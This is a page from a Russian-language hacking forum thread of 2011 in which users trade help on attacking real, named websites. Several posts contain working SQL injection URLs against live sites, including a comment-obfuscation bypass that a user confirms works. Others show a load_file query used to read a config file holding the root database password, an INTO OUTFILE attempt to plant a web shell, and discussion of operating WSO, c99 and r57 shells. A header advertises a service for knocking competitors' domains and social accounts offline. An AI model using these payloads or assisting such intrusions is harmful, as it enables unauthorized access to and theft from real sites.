УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1862 из 2438

1862

Опции темы

Поиск в этой теме

Опции просмотра

#18611

21.11.2011, 12:08

shadowrun

Guest

Сообщений: n/a

Провел на форуме:
183267

Репутация: 84

Ломал Железного Майка , но столкнулся с этим:

Код:

Code:
http://ironmiketyson.ru/article_read.php?id=1+union+select+1+--+

хотя,

Код:

Code:
http://ironmiketyson.ru/article_read.php?id=1+order+by+1+--+

обрабатывается нормально. Раньше не сталкивался...

#18612

21.11.2011, 12:38

stepashka_

Познавший АНТИЧАТ

Регистрация: 09.11.2009

Сообщений: 1,077

Провел на форуме:
7879791

Репутация: 265

Отправить сообщение для stepashka_ с помощью ICQ

shadowrun, попробуй так http://ironmiketyson.ru/article_read.php?id=1+/*!union*/+/*!select*/+1+--+

сам не могу проверить, проксика нет

#18613

21.11.2011, 12:42

shadowrun

Guest

Сообщений: n/a

Провел на форуме:
183267

Репутация: 84

Цитата:

Сообщение от stepashka_

stepashka_ said:
shadowrun
, попробуй так http://ironmiketyson.ru/article_read.php?id=1+/*!union*/+/*!select*/+1+--+
сам не могу проверить, проксика нет

Пошло дело . Спасибо.

#18614

21.11.2011, 16:48

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Нашёл очень лакомую Time-Based скулю. Подскажите нормальный софт, ориентированный именно на неё ??

З.Ы. Канал стабильный, без скачков.

#18615

22.11.2011, 21:45

DJ ][akep

Познающий

Регистрация: 27.01.2008

Сообщений: 57

Провел на форуме:
355954

Репутация: 32

Цитата:

Сообщение от None

http://www.play-money.ru/index.aspx?inf=30'

Можно ли как-то это использовать и куда копать?

#18616

22.11.2011, 22:04

er9j6@

Guest

Сообщений: n/a

Провел на форуме:
107835

Репутация: 23

Цитата:

Сообщение от DJ

[akep"]
DJ ][akep said:
Можно ли как-то это использовать и куда копать?

Для начало поищи другой уязвимый параметр

#18617

23.11.2011, 07:58

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от BigBear

BigBear said:
Нашёл очень лакомую Time-Based скулю. Подскажите
нормальный софт
, ориентированный именно на неё ??
З.Ы. Канал стабильный, без скачков.

Хех. Цитирую сам себя уже.

Ну в общем нашёл я нужную утилиту. Называется Marathon Tool

Специально заточена под Time-Based SQL

Сайт автора тут

#18618

23.11.2011, 15:15

lion-art

Guest

Сообщений: n/a

Провел на форуме:
7046

Репутация: 1

Прошу помощи!

Как всегда начну с фразы: "Уважаемые знатоки!"

Есть сайт:

1)file_priv=y

2)mq=off

3) есть /test.php

3) Доступ 4х администраторов в админку есть, доступ в админку www.site.ru/cms) - так он не пускает но если через www.site.ru/index.php/cms тогда пускает но не выполняются скрипты.

4) прочитан config.ini есть пароль root к базе. Но путь до самой базы не известен.

Теперь самое интересное:

config.ini прочитан так:

index/***/id/*21'+or+1+group+by+concat(mid(load_file(0xздес ьхеш),50,163),floor(rand(0)*2))+having+min(0)+ or+1+--+

запрос на запись делаем так: /image/*****/id/*53+and+(select+'+into+outfile+')+!=1

результат - ошибка но через пару часов при

/image/*****/id/*53 без инъекта появляется следущее:

яШяаJFIFHHяб4ExifII*bj( 1r2Ћi‡¤шЂь 'Ђь 'Adobe Photoshop CS2 Windows2011:07:05 16:16:46†’Ъ яя Ж zLEAD Technologies Inc. V1.01FN(VЦHHяШ� �аJFIFHHянAdobe_CMяоAdobedЂяЫ„ яАc "яЭ яД? 3!1AQa"qЃ2‘Ў

и т.д...

ВНИМАНИЕ ВОПРОС!

На сколько высока вероятность то что into outfile не получится (доходчиво: шелл не зальется?)

P.S. возможно не правильный запрос но если запрос сделать так

/image/*****/id/*53+and+'select+'+into+outfile+'+!=1'

то ошибка такова:

Invalid query: File ' !=1' already exists

Спасибо за внимание надеюсь на коментарии, может у кого-то похожая ситуация была.

#18619

23.11.2011, 18:01

Unknown

Guest

Сообщений: n/a

Провел на форуме:
129743

Репутация: 92

На линьке WSO. Нужно из шелла попасть в одну директорию, но в ней содержится оочень много файлов одного расширения и поэтому, при заходе в директорию отображается пустая страница. Как исправить это недоразумение?

Использовал другие шеллы: с99, r57 и т.д. Результат один и он не устраивает.

Надеюсь вопрос корректно составлен.

#18620

23.11.2011, 18:03

Boolean

Guest

Сообщений: n/a

Провел на форуме:
40748

Репутация: 78

Цитата:

Сообщение от mix0x0

mix0x0 said:
На линьке WSO. Нужно из шелла попасть в одну директорию, но в ней содержится оочень много файлов одного расширения и поэтому, при заходе в директорию отображается пустая страница. Как исправить это недоразумение?
Использовал другие шеллы: с99, r57 и т.д. Результат один и он не устраивает.
Надеюсь вопрос корректно составлен.

зайди в консоль(в шелле) ls -lah /путь/до/директории

Страница 1862 из 2438

1862

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход